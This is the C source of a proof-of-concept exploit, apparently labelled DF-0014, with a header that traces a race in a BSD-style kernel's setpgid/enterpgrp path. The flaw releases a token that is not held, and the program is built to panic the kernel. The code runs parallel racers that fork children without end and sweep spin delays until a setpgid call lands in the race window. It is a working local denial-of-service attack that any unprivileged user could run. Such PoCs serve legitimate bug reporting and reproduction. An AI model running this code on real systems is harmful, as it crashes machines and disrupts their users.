/*
 * DF-0014 PoC - enterpgrp() lwkt_reltoken on an un-acquired token -> panic.
 *
 * Bug: enterpgrp() new-pgrp error path (sys/kern/kern_proc.c:763-768) calls
 * lwkt_reltoken(&prg->proc_token) at :764 without the token held. pfindn()
 * (:544-575) never returns with proc_token held; enterpgrp acquires it only
 * on the success path at :770. Releasing an un-held token triggers
 * panic("lwkt_reltoken: illegal release") (sys/kern/lwkt_token.c:853).
 *
 * Race (confirmed by line-by-line trace of sys/kern/kern_exit.c +
 * kern_prot.c + kern_proc.c):
 *
 *   parent                           child (target of setpgid)
 *   ------                           -----
 *   sys_setpgid:372 pfind(child)     exit1():304 gettoken(p_token)
 *     -> child SACTIVE                ...fd cleanup, vmspace exit...
 *   sys_setpgid:379                 exit1():432 reltoken(p_token)
 *     gettoken(targp->p_token)       exit1():433 vmspace_relexit
 *     -> BLOCKS (child holds it      exit1():434 gettoken(p_token)
 *        from :434 on; child past     ...reaper/session/child reparent...
 *        vmspace_relexit)            kern_proc.c:1189 p_stat = SZOMB
 *                                    exit1():792 reltoken(p_token)
 *     -> parent woken, acquires p_token
 *   enterpgrp:763 pfindn(child)
 *     -> child is SZOMB -> NULL
 *   enterpgrp:764 lwkt_reltoken(NOT HELD)
 *     -> PANIC
 *
 * The window: parent's pfind(:372) must see SACTIVE, then parent blocks at
 * gettoken(:379) because child holds p_token (child is past exit1:434). Child
 * becomes SZOMB at kern_proc.c:1189, releases p_token at exit1:792. Parent's
 * pfindn then sees SZOMB -> error path -> panic.
 *
 * The child needs ~20-100us to reach the exit1:434..528 window after fork.
 * We sweep a wide spin-delay range so some iterations land the child exactly
 * there. Optional periodic sched_yield() calls (yield_every > 0; off by
 * default) cover the case where the child was placed on the same CPU as
 * the parent.
 *
 * Build:  cc -O2 -o setpgid_panic setpgid_panic.c
 * Run:    ./setpgid_panic [sweep_max] [parallel] [yield_every]
 *         defaults: sweep=150000 parallel=4 yield=0
 */

#include <sys/wait.h>

#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Accumulator written by the delay loop. It is volatile so that every
 * store has to be performed and the loop cannot be removed as dead code.
 */
static volatile unsigned long g_sink;

/*
 * Busy-wait for n loop iterations.
 *
 * n           - number of iterations to spin.
 * yield_every - when non-zero, sched_yield() is called at every non-zero
 *               iteration index that is a multiple of this value;
 *               0 disables yielding.
 */
static inline void
spin_delay(unsigned long n, unsigned long yield_every)
{
	unsigned long step = 0;

	while (step < n) {
		g_sink += step;
		/* Index 0 is skipped, so a delay never starts with a yield. */
		if (yield_every != 0 && step != 0 && step % yield_every == 0)
			sched_yield();
		step++;
	}
}

/*
 * Run one racer forever: fork a child that exits immediately, spin for a
 * swept delay, call setpgid() on the child, then reap it.
 *
 * sweep_max   - the delay handed to spin_delay() cycles through
 *               0 .. sweep_max-1 across iterations; 0 means no delay.
 * id          - label printed in the progress messages.
 * yield_every - forwarded unchanged to spin_delay().
 *
 * Never returns. Calls _exit(1) if fork() fails.
 */
static void
racer(unsigned long sweep_max, unsigned long id, unsigned long yield_every)
{
	unsigned long i;

	for (i = 0;; i++) {
		unsigned long delay;
		pid_t c = fork();

		if (c < 0) {
			perror("fork");
			_exit(1);
		}
		if (c == 0)
			_exit(0);

		/* i % 0 is undefined behaviour; treat sweep_max == 0 as no delay. */
		delay = (sweep_max != 0) ? i % sweep_max : 0;
		spin_delay(delay, yield_every);

		/*
		 * This is the call the race targets (see the file header).
		 * Its result is deliberately ignored.
		 */
		(void)setpgid(c, 0);

		/*
		 * Retry only when interrupted by a signal. Any other failure
		 * (e.g. ECHILD) is permanent, so stop waiting for this child
		 * instead of spinning forever.
		 */
		while (waitpid(c, NULL, 0) < 0) {
			if (errno != EINTR)
				break;
		}

		/* Progress line once every 0x4000 (16384) iterations. */
		if ((i & 0x3fff) == 0)
			fprintf(stderr, "[racer %lu] %lu iters\n", id, i);
	}
}

/*
 * Parse a non-negative decimal command-line argument.
 *
 * text - NUL-terminated argument string.
 * out  - receives the parsed value on success; untouched on failure.
 *
 * Returns 0 on success, -1 if text is empty, does not start with a digit,
 * has trailing characters, or does not fit in an unsigned long.
 */
static int
parse_ulong_arg(const char *text, unsigned long *out)
{
	char *end;
	unsigned long value;

	/*
	 * strtoul() accepts a leading '-' and negates the result, so insist
	 * on a leading digit to reject negative numbers outright.
	 */
	if (text[0] < '0' || text[0] > '9')
		return -1;

	errno = 0;
	value = strtoul(text, &end, 10);
	if (errno == ERANGE || *end != '\0')
		return -1;

	*out = value;
	return 0;
}

/*
 * Entry point: ./setpgid_panic [sweep_max] [parallel] [yield_every]
 *
 * Parses the optional arguments (defaults: 150000, 4, 0), prints the
 * effective configuration, then starts `parallel` racers: parallel-1 forked
 * children plus the calling process itself. A parallel value of 0 or 1 runs
 * a single racer in the calling process.
 *
 * Returns 2 on invalid arguments and 1 if fork() fails (racers that were
 * already started keep running). racer() loops forever, so the trailing
 * `return 0` statements are not expected to be reached.
 */
int
main(int argc, char **argv)
{
	unsigned long sweep_max = 150000;
	unsigned long parallel = 4;
	unsigned long yield_every = 0;
	unsigned long k;

	/*
	 * racer() uses sweep_max as a modulus, so 0 is rejected here together
	 * with malformed, negative, or out-of-range values.
	 */
	if ((argc > 1 && parse_ulong_arg(argv[1], &sweep_max) != 0) ||
	    (argc > 2 && parse_ulong_arg(argv[2], &parallel) != 0) ||
	    (argc > 3 && parse_ulong_arg(argv[3], &yield_every) != 0) ||
	    sweep_max == 0) {
		fprintf(stderr,
			"usage: %s [sweep_max >= 1] [parallel] [yield_every]\n",
			argc > 0 ? argv[0] : "setpgid_panic");
		return 2;
	}

	fprintf(stderr,
		"[*] DF-0014 racer: sweep=%lu parallel=%lu yield_every=%lu\n",
		sweep_max, parallel, yield_every);

	if (parallel <= 1) {
		racer(sweep_max, 0, yield_every);
		return 0;
	}

	/* Children take ids 1 .. parallel-1; this process becomes racer 0. */
	for (k = 1; k < parallel; k++) {
		pid_t p = fork();
		if (p < 0) {
			perror("fork");
			return 1;
		}
		if (p == 0) {
			racer(sweep_max, k, yield_every);
			_exit(0);
		}
	}
	racer(sweep_max, 0, yield_every);
	return 0;
}
